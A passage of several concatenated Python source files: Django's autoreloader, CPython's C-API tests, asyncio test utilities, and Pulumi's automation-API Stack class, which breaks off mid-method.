"""Return the most suitable reloader for this environment."""
try:
WatchmanReloader.check_availability()
except WatchmanUnavailable:
return StatReloader()
return WatchmanReloader()
def start_django(reloader, main_func, *args, **kwargs):
ensure_echo_on()
main_func = check_errors(main_func)
django_main_thread = threading.Thread(target=main_func, args=args, kwargs=kwargs, name='django-main-thread')
django_main_thread.setDaemon(True)
django_main_thread.start()
while not reloader.should_stop:
try:
reloader.run(django_main_thread)
except WatchmanUnavailable as ex:
# It's possible that the watchman service shuts down or otherwise
# becomes unavailable. In that case, use the StatReloader.
reloader = StatReloader()
logger.error('Error connecting to Watchman: %s', ex)
logger.info('Watching for file changes with %s', reloader.__class__.__name__)
def run_with_reloader(main_func, *args, **kwargs):
signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
try:
if os.environ.get(DJANGO_AUTORELOAD_ENV) == 'true':
reloader = get_reloader()
logger.info('Watching for file changes with %s', reloader.__class__.__name__)
start_django(reloader, main_func, *args, **kwargs)
else:
exit_code = restart_with_reloader()
sys.exit(exit_code)
except KeyboardInterrupt:
pass
|
test_capi.py | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from __future__ import with_statement
import sys
import time
import random
import unittest
from test import test_support as support
try:
import thread
import threading
except ImportError:
thread = None
threading = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
class CAPITest(unittest.TestCase):
@support.impl_detail("Currently broken on pypy", pypy=False)
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
skips = []
if support.check_impl_detail(pypy=True):
skips += [
'test_buildvalue_N',
'test_capsule',
'test_lazy_hash_inheritance',
'test_widechar',
'TestThreadState',
'TestPendingCalls',
]
@unittest.skipUnless(threading and 'TestPendingCalls' not in skips, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print "(%i)"%(len(l),),
for i in xrange(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print "(%i)"%(len(l),)
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print "finished threads: ", nFinished
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
@unittest.skipUnless(threading and thread and 'TestThreadState' not in skips, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(thread.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(thread.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
def test_main():
for name in dir(_testcapi):
if name.startswith('test_') and name not in skips:
test = getattr(_testcapi, name)
if support.verbose:
print "internal", name
try:
test()
except _testcapi.error:
raise support.TestFailed, sys.exc_info()[1]
support.run_unittest(CAPITest, TestPendingCalls, TestThreadState)
if __name__ == "__main__":
test_main()
|
utils.py | """Utilities shared by tests."""
import collections
import contextlib
import io
import logging
import os
import re
import selectors
import socket
import socketserver
import sys
import tempfile
import threading
import time
import unittest
import weakref
from unittest import mock
from http.server import HTTPServer
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from asyncio import base_events
from asyncio import events
from asyncio import format_helpers
from asyncio import futures
from asyncio import tasks
from asyncio.log import logger
from test import support
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Jul 7 14:23:16 2028 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
def simple_server_sslcontext():
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
return server_context
def simple_client_sslcontext(*, disable_verify=True):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.check_hostname = False
if disable_verify:
client_context.verify_mode = ssl.CERT_NONE
return client_context
def dummy_ssl_context():
if ssl is None:
return None
else:
return ssl.SSLContext(ssl.PROTOCOL_TLS)
def run_briefly(loop):
async def once():
pass
gen = once()
t = loop.create_task(gen)
# Don't log a warning if the task is not done after run_until_complete().
# It occurs if the loop is stopped or if a task raises a BaseException.
t._log_destroy_pending = False
try:
loop.run_until_complete(t)
finally:
gen.close()
def run_until(loop, pred, timeout=30):
deadline = time.time() + timeout
while not pred():
if timeout is not None:
timeout = deadline - time.time()
if timeout <= 0:
raise futures.TimeoutError()
loop.run_until_complete(tasks.sleep(0.001))
def run_once(loop):
"""Legacy API to run once through the event loop.
This is the recommended pattern for test code. It will poll the
selector once and run all callbacks scheduled in response to I/O
events.
"""
loop.call_soon(loop.stop)
loop.run_forever()
class SilentWSGIRequestHandler(WSGIRequestHandler):
def get_stderr(self):
return io.StringIO()
def log_message(self, format, *args):
pass
class SilentWSGIServer(WSGIServer):
request_timeout = 2
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
return request, client_addr
def handle_error(self, request, client_address):
pass
class SSLWSGIServerMixin:
def finish_request(self, request, client_address):
# The relative location of our test directory (which
# contains the ssl key and certificate files) differs
# between the stdlib and stand-alone asyncio.
# Prefer our own if we can find it.
here = os.path.join(os.path.dirname(__file__), '..', 'tests')
if not os.path.isdir(here):
here = os.path.join(os.path.dirname(os.__file__),
'test', 'test_asyncio')
keyfile = os.path.join(here, 'ssl_key.pem')
certfile = os.path.join(here, 'ssl_cert.pem')
context = ssl.SSLContext()
context.load_cert_chain(certfile, keyfile)
ssock = context.wrap_socket(request, server_side=True)
try:
self.RequestHandlerClass(ssock, client_address, self)
ssock.close()
except OSError:
# maybe socket has been closed by peer
pass
class SSLWSGIServer(SSLWSGIServerMixin, SilentWSGIServer):
pass
def _run_test_server(*, address, use_ssl=False, server_cls, server_ssl_cls):
def app(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain')]
start_response(status, headers)
return [b'Test message']
# Run the test WSGI server in a separate thread in order not to
# interfere with event handling in the main thread
server_class = server_ssl_cls if use_ssl else server_cls
httpd = server_class(address, SilentWSGIRequestHandler)
httpd.set_app(app)
httpd.address = httpd.server_address
server_thread = threading.Thread(
target=lambda: httpd.serve_forever(poll_interval=0.05))
server_thread.start()
try:
yield httpd
finally:
httpd.shutdown()
httpd.server_close()
server_thread.join()
if hasattr(socket, 'AF_UNIX'):
class UnixHTTPServer(socketserver.UnixStreamServer, HTTPServer):
def server_bind(self):
socketserver.UnixStreamServer.server_bind(self)
self.server_name = '127.0.0.1'
self.server_port = 80
class UnixWSGIServer(UnixHTTPServer, WSGIServer):
request_timeout = 2
def server_bind(self):
UnixHTTPServer.server_bind(self)
self.setup_environ()
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
# Code in the stdlib expects that get_request
# will return a socket and a tuple (host, port).
# However, this isn't true for UNIX sockets,
# as the second return value will be a path;
# hence we return some fake data sufficient
# to get the tests going
return request, ('127.0.0.1', '')
class SilentUnixWSGIServer(UnixWSGIServer):
def handle_error(self, request, client_address):
pass
class UnixSSLWSGIServer(SSLWSGIServerMixin, SilentUnixWSGIServer):
pass
def gen_unix_socket_path():
with tempfile.NamedTemporaryFile() as file:
return file.name
@contextlib.contextmanager
def unix_socket_path():
path = gen_unix_socket_path()
try:
yield path
finally:
try:
os.unlink(path)
except OSError:
pass
@contextlib.contextmanager
def run_test_unix_server(*, use_ssl=False):
with unix_socket_path() as path:
yield from _run_test_server(address=path, use_ssl=use_ssl,
server_cls=SilentUnixWSGIServer,
server_ssl_cls=UnixSSLWSGIServer)
@contextlib.contextmanager
def run_test_server(*, host='127.0.0.1', port=0, use_ssl=False):
yield from _run_test_server(address=(host, port), use_ssl=use_ssl,
server_cls=SilentWSGIServer,
server_ssl_cls=SSLWSGIServer)
def make_test_protocol(base):
dct = {}
for name in dir(base):
if name.startswith('__') and name.endswith('__'):
# skip magic names
continue
dct[name] = MockCallback(return_value=None)
return type('TestProtocol', (base,) + base.__bases__, dct)()
class TestSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout):
return []
def get_map(self):
return self.keys
class TestLoop(base_events.BaseEventLoop):
"""Loop for unittests.
It manages self time directly.
If something scheduled to be executed later then
on next loop iteration after all ready handlers done
generator passed to __init__ is calling.
Generator should be like this:
def gen():
...
when = yield ...
... = yield time_advance
Value returned by yield is absolute time of next scheduled handler.
Value passed to yield is time advance to move loop's time forward.
"""
def __init__(self, gen=None):
super().__init__()
if gen is None:
def gen():
yield
self._check_on_close = False
else:
self._check_on_close = True
self._gen = gen()
next(self._gen)
self._time = 0
self._clock_resolution = 1e-9
self._timers = []
self._selector = TestSelector()
self.readers = {}
self.writers = {}
self.reset_counters()
self._transports = weakref.WeakValueDictionary()
def time(self):
return self._time
def advance_time(self, advance):
"""Move test time forward."""
if advance:
self._time += advance
def close(self):
super().close()
if self._check_on_close:
try:
self._gen.send(0)
except StopIteration:
pass
else: # pragma: no cover
raise AssertionError("Time generator is not finished")
def _add_reader(self, fd, callback, *args):
self.readers[fd] = events.Handle(callback, args, self, None)
def _remove_reader(self, fd):
self.remove_reader_count[fd] += 1
if fd in self.readers:
del self.readers[fd]
return True
else:
return False
def assert_reader(self, fd, callback, *args):
if fd not in self.readers:
raise AssertionError(f'fd {fd} is not registered')
handle = self.readers[fd]
if handle._callback != callback:
raise AssertionError(
f'unexpected callback: {handle._callback} != {callback}')
if handle._args != args:
raise AssertionError(
f'unexpected callback args: {handle._args} != {args}')
def assert_no_reader(self, fd):
if fd in self.readers:
raise AssertionError(f'fd {fd} is registered')
def _add_writer(self, fd, callback, *args):
self.writers[fd] = events.Handle(callback, args, self, None)
def _remove_writer(self, fd):
self.remove_writer_count[fd] += 1
if fd in self.writers:
del self.writers[fd]
return True
else:
return False
def assert_writer(self, fd, callback, *args):
assert fd in self.writers, 'fd {} is not registered'.format(fd)
handle = self.writers[fd]
assert handle._callback == callback, '{!r} != {!r}'.format(
handle._callback, callback)
assert handle._args == args, '{!r} != {!r}'.format(
handle._args, args)
def _ensure_fd_no_transport(self, fd):
if not isinstance(fd, int):
try:
fd = int(fd.fileno())
except (AttributeError, TypeError, ValueError):
# This code matches selectors._fileobj_to_fd function.
raise ValueError("Invalid file object: "
"{!r}".format(fd)) from None
try:
transport = self._transports[fd]
except KeyError:
pass
else:
raise RuntimeError(
'File descriptor {!r} is used by transport {!r}'.format(
fd, transport))
def add_reader(self, fd, callback, *args):
"""Add a reader callback."""
self._ensure_fd_no_transport(fd)
return self._add_reader(fd, callback, *args)
def remove_reader(self, fd):
"""Remove a reader callback."""
self._ensure_fd_no_transport(fd)
return self._remove_reader(fd)
def add_writer(self, fd, callback, *args):
"""Add a writer callback.."""
self._ensure_fd_no_transport(fd)
return self._add_writer(fd, callback, *args)
def remove_writer(self, fd):
"""Remove a writer callback."""
self._ensure_fd_no_transport(fd)
return self._remove_writer(fd)
def reset_counters(self):
self.remove_reader_count = collections.defaultdict(int)
self.remove_writer_count = collections.defaultdict(int)
def _run_once(self):
super()._run_once()
for when in self._timers:
advance = self._gen.send(when)
self.advance_time(advance)
self._timers = []
def call_at(self, when, callback, *args, context=None):
self._timers.append(when)
return super().call_at(when, callback, *args, context=context)
def _process_events(self, event_list):
return
def _write_to_self(self):
pass
def MockCallback(**kwargs):
return mock.Mock(spec=['__call__'], **kwargs)
class MockPattern(str):
"""A regex based str with a fuzzy __eq__.
Use this helper with 'mock.assert_called_with', or anywhere
where a regex comparison between strings is needed.
For instance:
mock_call.assert_called_with(MockPattern('spam.*ham'))
"""
def __eq__(self, other):
return bool(re.search(str(self), other, re.S))
class MockInstanceOf:
def __init__(self, type):
self._type = type
def __eq__(self, other):
return isinstance(other, self._type)
def get_function_source(func):
source = format_helpers._get_function_source(func)
if source is None:
raise ValueError("unable to get the source of %r" % (func,))
return source
class TestCase(unittest.TestCase):
@staticmethod
def close_loop(loop):
executor = loop._default_executor
if executor is not None:
executor.shutdown(wait=True)
loop.close()
def set_event_loop(self, loop, *, cleanup=True):
assert loop is not None
# ensure that the event loop is passed explicitly in asyncio
events.set_event_loop(None)
if cleanup:
self.addCleanup(self.close_loop, loop)
def new_test_loop(self, gen=None):
loop = TestLoop(gen)
self.set_event_loop(loop)
return loop
def unpatch_get_running_loop(self):
events._get_running_loop = self._get_running_loop
def setUp(self):
self._get_running_loop = events._get_running_loop
events._get_running_loop = lambda: None
self._thread_cleanup = support.threading_setup()
def tearDown(self):
self.unpatch_get_running_loop()
events.set_event_loop(None)
# Detect CPython bug #23353: ensure that yield/yield-from is not used
# in an except block of a generator
self.assertEqual(sys.exc_info(), (None, None, None))
self.doCleanups()
support.threading_cleanup(*self._thread_cleanup)
support.reap_children()
@contextlib.contextmanager
def disable_logger():
"""Context manager to disable asyncio logger.
For example, it can be used to ignore warnings in debug mode.
"""
old_level = logger.level
try:
logger.setLevel(logging.CRITICAL+1)
yield
finally:
logger.setLevel(old_level)
def mock_nonblocking_socket(proto=socket.IPPROTO_TCP, type=socket.SOCK_STREAM,
family=socket.AF_INET):
"""Create a mock of a non-blocking socket."""
sock = mock.MagicMock(socket.socket)
sock.proto = proto
sock.type = type
sock.family = family
sock.gettimeout.return_value = 0.0
return sock
|
_stack.py | # Copyright 2016-2021, Pulumi Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import tempfile
import time
import threading
from concurrent import futures
from enum import Enum
from datetime import datetime
from typing import List, Any, Mapping, MutableMapping, Optional, Callable, Tuple
import grpc
from ._cmd import CommandResult, _run_pulumi_cmd, OnOutput
from ._config import ConfigValue, ConfigMap
from .errors import StackAlreadyExistsError
from .events import OpMap, EngineEvent, SummaryEvent
from ._output import OutputMap
from ._server import LanguageServer
from ._workspace import Workspace, PulumiFn, Deployment
from ..runtime.settings import _GRPC_CHANNEL_OPTIONS
from ..runtime.proto import language_pb2_grpc
_DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
OnEvent = Callable[[EngineEvent], Any]
class ExecKind(str, Enum):
LOCAL = "auto.local"
INLINE = "auto.inline"
class StackInitMode(Enum):
CREATE = "create"
SELECT = "select"
CREATE_OR_SELECT = "create_or_select"
class UpdateSummary:
def __init__(self,
# pre-update info
kind: str,
start_time: datetime,
message: str,
environment: Mapping[str, str],
config: Mapping[str, dict],
# post-update info
result: str,
end_time: datetime,
version: Optional[int] = None,
deployment: Optional[str] = None,
resource_changes: Optional[OpMap] = None):
self.kind = kind
self.start_time = start_time
self.end_time = end_time
self.message = message
self.environment = environment
self.result = result
self.Deployment = deployment
self.resource_changes = resource_changes
self.version = version
self.config: ConfigMap = {}
for key in config:
config_value = config[key]
self.config[key] = ConfigValue(value=config_value["value"], secret=config_value["secret"])
def __repr__(self):
return f"UpdateSummary(result={self.result!r}, version={self.version!r}, " \
f"start_time={self.start_time!r}, end_time={self.end_time!r}, kind={self.kind!r}, " \
f"message={self.message!r}, environment={self.environment!r}, " \
f"resource_changes={self.resource_changes!r}, config={self.config!r}, Deployment={self.Deployment!r})"
class BaseResult:
def __init__(self, stdout: str, stderr: str):
self.stdout = stdout
self.stderr = stderr
def __repr__(self):
inputs = self.__dict__
fields = [f"{key}={inputs[key]!r}" for key in inputs] # pylint: disable=consider-using-dict-items
fields = ", ".join(fields)
return f"{self.__class__.__name__}({fields})"
class PreviewResult(BaseResult):
def __init__(self, stdout: str, stderr: str, change_summary: OpMap):
super().__init__(stdout, stderr)
self.change_summary = change_summary
class UpResult(BaseResult):
def __init__(self, stdout: str, stderr: str, summary: UpdateSummary, outputs: OutputMap):
super().__init__(stdout, stderr)
self.outputs = outputs
self.summary = summary
class RefreshResult(BaseResult):
def __init__(self, stdout: str, stderr: str, summary: UpdateSummary):
super().__init__(stdout, stderr)
self.summary = summary
class DestroyResult(BaseResult):
def __init__(self, stdout: str, stderr: str, summary: UpdateSummary):
super().__init__(stdout, stderr)
self.summary = summary
class Stack:
@classmethod
def create(cls, stack_name: str, workspace: Workspace) -> 'Stack':
"""
Creates a new stack using the given workspace, and stack name.
It fails if a stack with that name already exists.
:param stack_name: The name identifying the Stack
:param workspace: The Workspace the Stack was created from.
:return: Stack
"""
return Stack(stack_name, workspace, StackInitMode.CREATE)
@classmethod
def select(cls, stack_name: str, workspace: Workspace) -> 'Stack':
"""
Selects stack using the given workspace, and stack name.
It returns an error if the given Stack does not exist.
:param stack_name: The name identifying the Stack
:param workspace: The Workspace the Stack was created from.
:return: Stack
"""
return Stack(stack_name, workspace, StackInitMode.SELECT)
@classmethod
def create_or_select(cls, stack_name: str, workspace: Workspace) -> 'Stack':
"""
Tries to create a new stack using the given workspace and stack name if the stack does not already exist,
or falls back to selecting the existing stack. If the stack does not exist,
it will be created and selected.
:param stack_name: The name identifying the Stack
:param workspace: The Workspace the Stack was created from.
:return: Stack
"""
return Stack(stack_name, workspace, StackInitMode.CREATE_OR_SELECT)
def __init__(self, name: str, workspace: Workspace, mode: StackInitMode) -> None:
"""
Stack is an isolated, independently configurable instance of a Pulumi program.
Stack exposes methods for the full pulumi lifecycle (up/preview/refresh/destroy), as well as managing configuration.
Multiple Stacks are commonly used to denote different phases of development
(such as development, staging and production) or feature branches (such as feature-x-dev, jane-feature-x-dev).
"""
self.name = name
self.workspace = workspace
self._mode = mode
if not isinstance(name, str):
raise TypeError("name must be of type 'str'")
if not isinstance(workspace, Workspace):
raise TypeError("workspace must be of type 'Workspace'")
if not isinstance(mode, StackInitMode):
raise TypeError("mode must be of type 'StackInitMode'")
if mode is StackInitMode.CREATE:
workspace.create_stack(name)
elif mode is StackInitMode.SELECT:
workspace.select_stack(name)
elif mode is StackInitMode.CREATE_OR_SELECT:
try:
workspace.create_stack(name)
except StackAlreadyExistsError:
workspace.select_stack(name)
def __repr__(self):
return f"Stack(stack_name={self.name!r}, workspace={self.workspace!r}, mode={self._mode!r})"
def __str__(self):
return f"Stack(stack_name={self.name!r}, workspace={self.workspace!r})"
def up(self,
parallel: Optional[int] = None,
message: Optional[str] = None,
target: Optional[List[str]] = None,
expect_no_changes: Optional[bool] = None,
diff: Optional[bool] = None,
target_dependents: Optional[bool] = None,
replace: Optional[List[str]] = None,
on_output: Optional[OnOutput] = None,
on_event: Optional[OnEvent] = None,
program: Optional[PulumiFn] = None) -> UpResult:
"""
Creates or updates the resources in a stack by executing the program in the Workspace.
https://www.pulumi.com/docs/reference/cli/pulumi_up/
:param parallel: Parallel is the number of resource operations to run in parallel at once.
(1 for no parallelism). Defaults to unbounded (2147483647).
:param message: Message (optional) to associate with the update operation.
:param target: Specify an exclusive list of resource URNs to destroy.
:param expect_no_changes: Return an error if any changes occur during this update.
:param diff: Display operation as a rich diff showing the overall change.
:param target_dependents: Allows updating of dependent targets discovered but not specified in the Target list.
:param replace: Specify resources to replace.
:param on_output: A function to process the stdout stream.
:param on_event: A function to process structured events from the Pulumi event stream.
:param program: The inline program.
:returns: UpResult
"""
# Disable unused-argument because pylint doesn't understand we process them in _parse_extra_args
# pylint: disable=unused-argument
program = program or self.workspace.program
extra_args = _parse_extra_args(**locals())
args = ["up", "--yes", "--skip-preview"]
args.extend(extra_args)
kind = ExecKind.LOCAL.value
on_exit = None
if program:
kind = ExecKind.INLINE.value
server = grpc.server(futures.ThreadPoolExecutor(max_workers=4), # pylint: disable=consider-using-with
options=_GRPC_CHANNEL_OPTIONS)
language_server = LanguageServer(program)
language_pb2_grpc.add_LanguageRuntimeServicer_to_server(language_server, server)
port = server.add_insecure_port(address="0.0.0.0:0")
server.start()
def on_exit_fn():
language_server.on_pulumi_exit()
server.stop(0)
on_exit = on_exit_fn
args.append(f"--client=127.0.0.1:{port}")
args.extend(["--exec-kind", kind])
log_watcher_thread = None
temp_dir = None
if on_event:
log_file, temp_dir = _create_log_file("up")
args.extend(["--event-log", log_file])
log_watcher_thread = threading.Thread(target=_watch_logs, args=(log_file, on_event))
log_watcher_thread.start()
try:
up_result = self._run_pulumi_cmd_sync(args, on_output)
outputs = self.outputs()
summary = self.info()
assert summary is not None
finally:
_cleanup(temp_dir, log_watcher_thread, on_exit)
return UpResult(stdout=up_result.stdout, stderr=up_result.stderr, summary=summary, outputs=outputs)
def preview(self,
parallel: Optional[int] = None,
message: Optional[str] = None,
target: Optional[List[str]] = None,
expect_no_changes: Optional[bool] = None,
diff: Optional[bool] = None,
target_dependents: Optional[bool] = None,
replace: Optional[List[str]] = None,
on_output: Optional[OnOutput] = None,
on_event: Optional[OnEvent] = None,
program: Optional[PulumiFn] = None) -> PreviewResult:
"""
Performs a dry-run update to a stack, returning pending changes.
https://www.pulumi.com/docs/reference/cli/pulumi_preview/
:param parallel: Parallel is the number of resource operations to run in parallel at once.
(1 for no parallelism). Defaults to unbounded (2147483647).
:param message: Message to associate with the preview operation.
:param target: Specify an exclusive list of resource URNs to update.
:param expect_no_changes: Return an error if any changes occur during this update.
:param diff: Display operation as a rich diff showing the overall change.
:param target_dependents: Allows updating of dependent targets discovered but not specified in the Target list.
:param replace: Specify resources to replace.
:param on_output: A function to process the stdout stream.
:param on_event: A function to process structured events from the Pulumi event stream.
:param program: The inline program.
:returns: PreviewResult
"""
# Disable unused-argument because pylint doesn't understand we process them in _parse_extra_args
# pylint: disable=unused-argument
program = program or self.workspace.program
extra_args = _parse_extra_args(**locals())
args = ["preview"]
args.extend(extra_args)
kind = ExecKind.LOCAL.value
on_exit = None
if program:
kind = ExecKind.INLINE.value
server = grpc.server(futures.ThreadPoolExecutor(max_workers=4), # pylint: disable=consider-using-with
options=_GRPC_CHANNEL_OPTIONS)
language_server = LanguageServer(program)
language_pb2_grpc.add_LanguageRuntimeServicer_to_server(language_server, server)
port = server.add_insecure_port(address="0.0.0.0:0")
server.start()
def on_exit_fn():
language_server.on_pulumi_exit()
server.stop(0)
on_exit = on_exit_fn
args.append(f"--client=127.0.0.1:{port}")
args.extend(["--exec-kind", kind])
log_file, temp_dir = _create_log_file("preview")
args.extend(["--event-log", log_file])
summary_events: List[SummaryEvent] = []
def on_event_callback(event: EngineEvent) -> None:
if event.summary_event:
summary_events.append(event.summary_event)
if on_event:
on_event(event)
# Start watching logs in a thread
log_watcher_thread = threading.Thread(target=_watch_logs, args=(log_file, on_event_callback))
log_watcher_thread.start()
try:
preview_result = self._run_pulumi_cmd_sync(args, on_output)
finally:
_cleanup(temp_dir, log_watcher_thread, on_exit)
if not summary_events:
raise RuntimeError("summary event never found")
return PreviewResult(stdout=preview_result.stdout,
stderr=preview_result.stderr,
change_summary=summary_events[0].resource_changes)
def refresh(self,
parallel: Optional[int] = None,
message: Optional[str] = None,
target: Optional[List[str]] = None,
expect_no_changes: Optional[bool] = None,
on_output: Optional[OnOutput] = None,
on_event: Optional[OnEvent] = None) -> RefreshResult:
"""
Compares the current stack’s resource state with the state known to exist in the actual
cloud provider. Any such changes are adopted into the current stack.
:param parallel: Parallel is the number of resource operations to run in parallel at once.
(1 for no parallelism). Defaults to unbounded (2147483647).
:param message: Message (optional) to associate with the refresh operation.
:param target: Specify an exclusive list of resource URNs to refresh.
:param expect_no_changes: Return an error if any changes occur during this update.
:param on_output: A function to process the stdout stream.
:param on_event: A function to process structured events from the Pulumi event stream.
:returns: RefreshResult
"""
# Disable unused-argument because pylint doesn't understand we process them in _parse_extra_args
# pylint: disable=unused-argument
extra_args = _parse_extra_args(**locals())
args = ["refresh", "--yes", "--skip-preview"]
args.extend(extra_args)
kind = ExecKind.INLINE.value if self.workspace.program else ExecKind.LOCAL.value
args.extend(["--exec-kind", kind])
log_watcher_thread = None
temp_dir = None
if on_event:
log_file, temp_dir = _create_log_file("refresh")
args.extend(["--event-log", log_file])
log_watcher_thread = threading.Thread(target=_watch_logs, args=(log_file, on_event))
log_watcher_thread.start()
try:
refresh_result = self._run_pulumi_cmd_sync(args, on_output)
finally:
_cleanup(temp_dir, log_watcher_thread)
summary = self.info()
assert summary is not None
return RefreshResult(stdout=refresh_result.stdout, stderr=refresh_result.stderr, summary=summary)
def destroy(self,
parallel: Optional[int] = None,
message: Optional[str] = None,
target: Optional[List[str]] = None,
target_dependents: Optional[bool] = None,
on_output: Optional[OnOutput] = None,
on_event: Optional[OnEvent] = None) -> DestroyResult:
"""
Destroy deletes all resources in a stack, leaving all history and configuration intact.
:param parallel: Parallel is the number of resource operations to run in parallel at once.
(1 for no parallelism). Defaults to unbounded (2147483647).
:param message: Message (optional) to associate with the destroy operation.
:param target: Specify an exclusive list of resource URNs to destroy.
:param target_dependents: Allows updating of dependent targets discovered but not specified in the Target list.
:param on_output: A function to process the stdout stream.
:param on_event: A function to process structured events from the Pulumi event stream.
:returns: DestroyResult
"""
# Disable unused-argument because pylint doesn't understand we process them in _parse_extra_args
# pylint: disable=unused-argument
extra_args = _parse_extra_args(**locals())
args = ["destroy", "--yes", "--skip-preview"]
args.extend(extra_args)
kind = ExecKind.INLINE.value if self.workspace.program else ExecKind.LOCAL.value
args.extend(["--exec-kind", kind])
log_watcher_thread = None
temp_dir = None
if on_event:
log_file, temp_dir = _create_log_file("destroy")
args.extend(["--event-log", log_file])
log_watcher_thread = threading.Thread(target=_watch_logs, args=(log_file, on_event))
log_watcher_thread.start()
try:
destroy_result = self._run_pulumi_cmd_sync(args, on_output)
finally:
_cleanup(temp_dir, log_watcher_thread)
summary = self.info()
assert summary is not None
return DestroyResult(stdout=destroy_result.stdout, stderr=destroy_result.stderr, summary=summary)
def get_config(self, key: str) -> ConfigValue:
"""
Returns the config value associated with the specified key.
:param key: The key for the config item to get.
:returns: ConfigValue
"""
return self.workspace.get_config(self.name, key)
def get_all_config(self) -> ConfigMap:
"""
Returns the full config map associated with the stack in the Workspace.
:returns: ConfigMap
"""
return self.workspace.get_all_config(self.name)
def set_config(self, key: str, value: ConfigValue) -> None:
"""
Sets a config key-value pair on the Stack in the associated Workspace.
:param key: The config key to add.
:param value: The config value to add.
"""
self.workspace.set_config(self.name, key, value)
def set_all_config(self, config: ConfigMap) -> None:
"""
Sets all specified config values on the stack in the associated Workspace.
:param config: A mapping of key to ConfigValue to set to config.
"""
self.workspace.set_all_config(self.name, config)
def remove_config(self, key: str) -> None:
"""
Removes the specified config key from the Stack in the associated Workspace.
:param key: The key to remove from config.
"""
self.workspace.remove_config(self.name, key)
def remove_all_config(self, keys: List[str]) -> None:
"""
Removes the specified config keys from the Stack in the associated Workspace.
:param keys: The keys to remove from config.
"""
self.workspace.remove_all_config(self.name, keys)
def refresh_config(self) -> None:
"""Gets and sets the config map used with the last update."""
self.workspace.refresh_config(self.name)
def outputs(self) -> OutputMap:
"""
Gets the current set of Stack outputs from the last Stack.up().
:returns: OutputMap
"""
return self.workspace.stack_outputs(self.name)
def history(self,
page_size: Optional[int] = None,
page: Optional[int] = None) -> List[UpdateSummary]:
"""
